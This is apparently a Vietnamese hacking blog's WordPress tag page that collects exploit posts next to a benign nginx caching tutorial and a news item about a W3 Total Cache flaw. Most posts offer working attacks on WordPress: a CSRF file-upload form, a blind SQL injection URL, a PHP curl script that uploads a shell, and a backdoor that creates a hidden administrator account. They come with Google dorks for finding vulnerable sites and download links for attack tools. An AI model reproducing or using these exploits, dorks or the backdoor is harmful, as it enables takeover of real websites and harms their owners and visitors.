Hiển thị các bài đăng có nhãn WordPress. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn WordPress. Hiển thị tất cả bài đăng

WordPress Curvo Themes - CSRF File Upload

################################################## #################################################
# Exploit Title: WordPress Curvo Themes CSRF File Upload Vulnerability
# Author: Byakuya
# Date: 10/26/2013
# Vendor Homepage: http://themeforest.net/
# Themes Link: http://www.wphub.com/themes/curvo-by-themeforest/
# Infected File: upload_handler.php
# Google dork: inurl:/wp-content/themes/curvo/
################################################## #################################################

# Exploit & POC :

<form enctype="multipart/form-data"
action="http://127.0.0.1/wordpress/wp-content/themes/curvo/functions/upload-handler.php" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

#File path:
http://site.com/wordpress/wp-content/uploads/[FILE]
or
http://site.com/wordpress/wp-content/uploads/[year]/[month]/[FILE]

Xem Thêm

 

Wordpress WP Realty Plugin - Blind SQL Injection

$$$$$$\      $$\   $$\     $$$$$$\ 
$$  __$$\     $$ |  $$ |   $$  __$$\
$$ /  \__|    $$ |  $$ |   $$ /  \__|
$$ |$$$$\     $$$$$$$$ |   \$$$$$$\ 
$$ |\_$$ |    $$  __$$ |    \____$$\
$$ |  $$ |    $$ |  $$ |   $$\   $$ |
\$$$$$$  |$$\ $$ |  $$ |$$\\$$$$$$  |
 \______/ \__|\__|  \__|\__|\______/
  
# Exploit Title: Wordpress - wp-realty - MySQL Time Based Injection
# Google Dork: inurl:"/wp-content/plugins/wp-realty/"
# Vendor: http://wprealty.org/
# Date: 10/08/2013
# Exploit Author: Napsterakos
 
 
Link: http://localhost/wordpress/wp-content/plugins/wp-realty/
 Exploit: http://localhost/wordpress/wp-content/plugins/wp-realty/index_ext.php?a
ction=contact_friend&popup=yes&listing_id=[SQLi]Credits to: Greek Hacking Scene

Xem Thêm

 

Wordpress Plugin Complete Gallery Manager 3.3.3 - Arbitrary File Upload Vulnerability

Exploit :

Code:
<?php
$uploadfile="up.php";
$ch = curl_init("http://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
 
?>





Shell Upload Access Path : http://wordpress.localhost:8080/wp-c...2013/09/up.php

Google Dork: allinurl:/wp-content/plugins/complete-gallery-manager/

Xem Thêm

 

Cấu hình Wordpress + WP Super Cache + Cloudflare trên nginx

Mở file vhost của tên miền lên, chúng ta sẽ thấy có đoạn

Code:
index index.php index.html index.htm;
        server_name abc.com;
 
        location / {
        try_files $uri $uri/ /index.php?$args;
          }
Sửa nó thành như sau

Code:
 index index.php index.html index.htm;
      server_name abc.com cdn.abc.com;
 
    set $cache_uri $request_uri;
 
    if ($request_method = POST) {
        set $cache_uri 'null cache';
    }
    if ($query_string != "") {
        set $cache_uri 'null cache';
    }
    if ($request_uri ~* "(/wp-admin/|/xmlrpc.php|/wp-(app|cron|login|register|mail).php|wp-.*.php|/feed/|index.php|wp-comments-popup.php|wp-links-opml.php|wp-locations.php|sitemap(_index)?.xml|[a-z0-9_-]+-sitemap([0-9]+)?.xml)") {
        set $cache_uri 'null cache';
    }
    if ($http_cookie ~* "comment_author|wordpress_[a-f0-9]+|wp-postpass|wordpress_logged_in") {
        set $cache_uri 'null cache';
    }
    location / {
        try_files /wp-content/cache/supercache/$http_host/$cache_uri/index.html $uri $uri/ /index.php;
    }
Restart lại nginx để cập nhật

Code:
service nginx restart
Cấp quyền cho nginx lên root document nếu các bạn chưa làm

Code:
chown -R nginx:nginx /home/abc.com/public_html
Cấu hình WP Super Cache

Các bạn đăng nhập vào admincp của wp, tìm đến các thiết lập liên quan đến wp super cache. Như của mình thì thấy như sau



Nhìn cái bảng màu vàng ghê ghê, các bạn mặc kệ nó, do php còn lưu cache nên nó chưa thấy đc giá trị wp super cache add vào file wp-config.php.

Các bạn tick vào Caching On, bấm update status, xong chạy lệnh sau để recache các file php

Code:
service php-fpm restart
tiếp theo bấm vào test cache để xem nó đã hoạt động hay chưa


Chuẩn rồi, mọi thứ đều đã hoạt động, giờ các bạn chuyển qua tab Advanced, thấy có rất nhiều tùy chọn, ừ thì cái nào có chữ recommended thì chọn trước, rồi sau đó sẽ xem xét tiếp



Xong thì các bạn bấm nút Update Status, sẽ lại xuất hiện mấy bảng cảnh báo như sau


Lỗi gì thế? và cách khắc phục như thế nào ? Đây không phải là lỗi, plugin này nó check mod_rewrite của apache nên đương nhiên nó nghĩ rằng server chưa cài đặt mod đó. Mà đúng là server chưa cài thật, vì chúng ta có sử dụng apache đâu

Thế thì, ừ kệ nó, nó báo gì kệ nó, nginx đã được chúng ta config chuẩn trước đó rồi, nên các bạn cứ yên tâm là plugin hoạt động rất tốt, ko hề lỗi lầm j

Tab Advanced là nơi chúng ta kết hợp wp super cache và config ở server, tiếp theo qua tab CDN sẽ là nơi chúng ta kết hợp giữa wordpress và cloudflare




Các bạn nhớ tick vào ô Enable CDN Support rồi sau đó setup như hình.


Đối với giá trị ở ô Include directories, mình để ý thấy 1 số bạn có thư mục HLIC chứa rất nhiều hình ảnh, các bạn nhớ thêm cả thư mục đó vào

Đối với ô Additional CNAMES, chúng ta thêm các sub mà chúng ta sẽ dùng để cdn phụ, đối với những trang có nhiều hình ảnh, js, css tĩnh, các cdn phụ này sẽ giúp cải thiện tốc độ tải trang đáng kể so với chỉ sử dụng 1 sub CDN

Cấu hình cloundflare

Bước cuối cùng là cấu hình ở cloudflare.com, các bạn đăng nhập vào và chắc chắn rằng dns setting của bạn đã có dạng như thế này


Tiếp theo chúng ta back trở lại danh sách tên miền đang dùng tại cloudflare (https://www.cloudflare.com/my-websites) sau đó chọn cloudflare settings cho tên miền tương ứng mà chúng ta muốn thiết lập


Sau đây là một số gợi ý của mình dành cho các bạn
VHB

Xem Thêm

 

WordPress plugin W3 Total Cache critical Vulnerability disclosed

One of the most popular Wordpress Plugin called "W3 Total Cache" which is used to Improve site performance and user experience via caching, having potential vulnerability. On Christmas day, someone disclose it on full-disclosure site that how a plugin misconfiguration leads to possible Wordpress cms hack.

W3+Total+Cache+critical+Vulnerability








The loophole is actually activated on the fact that how W3TC stores the database cache. Jason disclosed that cache data is stored in public accessible directory, from where a malicious attack can can retrieve password hashes and other database information.
Default location where this plugin stores data is "/wp-content/w3tc/dbcache/" and if directory listing is enabled, attacker can browse and download it.
He said,"Even with directory listings off, cache files are by default publicly downloadable, and the key values / file names of the database cache items are easily predictable."

Because the plugin is very famous ,so this makes quite easy for hackers to play with WordPress blogs. Author also publish a simple shell script to identify and exploit this bug.

We would like to recommend webmasters to either upgrade the plugin to new version or deny access to plugin directory by making an extra .htccess in that folder.

Theo: THN

Xem Thêm

 

Perl Attack Tools

Giới thiệu về tính năng các lựa chọn trong menu mình sẽ giới thiệu sau. Đây là demo của em nó!
[Hình: talent.PNG]
***mình hi vọng tool được ủng hộ và phát triển ở Việt Nam. Mọi sự sao chép mong các bạn tôn trọng bản quyền của tác giả
Thanks to -->Persia Security Group<--
links: http://www.mediafire.com/?nq8o41fyfqtisah
pass: talentkong@ceh.vn

Xem Thêm

 

Smart Hunter v.1.4.3 Public Version

Smart Hunter v.1.4.3 Public Version | Juno_okyo's Blog 
Smart Hunter v.1.4.3 Public Version | Juno_okyo's Blog

Download : http://adf.ly/FRrSF


Xem Thêm

 

Cross-site Scripting Vulnerability in WordPress GD Star Rating Plugin

Vector: Remote
Severity: Low
Patch: Unpatched
Impact: Cross-site Scripting (XSS)
Software: WordPress GD Star Rating Plugin 1.x , vulnerable versions: <=1.9.7
A cross-site scripting (XSS) vulnerability has been discovered in WordPress GD Star Rating Plugin.
An input validation error exists in wp-content/plugins/gd-star-rating/widgets/widget_top.php while processing the data passed to the parameter "wpfn". A remote attacker can send a specially crafted HTTP request to the vulnerable application and execute arbitrary html and scripting code in user`s browser in context of a vulnerable website.
Further exploitation of this vulnerability may result in stealing potentially sensitive to the user information, such as cookies, or disguising the information presented on the website.

Demo:
Click here to view!

Xem Thêm

 

WordPress Admin Access Backdoor


<?php 
add_action('wp_head', 'my_backdoor'); 

function my_backdoor() { 
If ($_GET['backdoor'] == 'go') { 
require('wp-includes/registration.php'); 
If (!username_exists('private')) { 
$user_id = wp_create_user('private', '12345678'); 
$user = new WP_User($user_id); 
$user->set_role('administrator'); 
} 
} 
} 
?>

Xem Thêm

 

WordPress Blog Exploit


search google: inurl:"fbconnect_action=myhome"

thay
?fbconnect_action=myhome&userid=

Xem Thêm

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương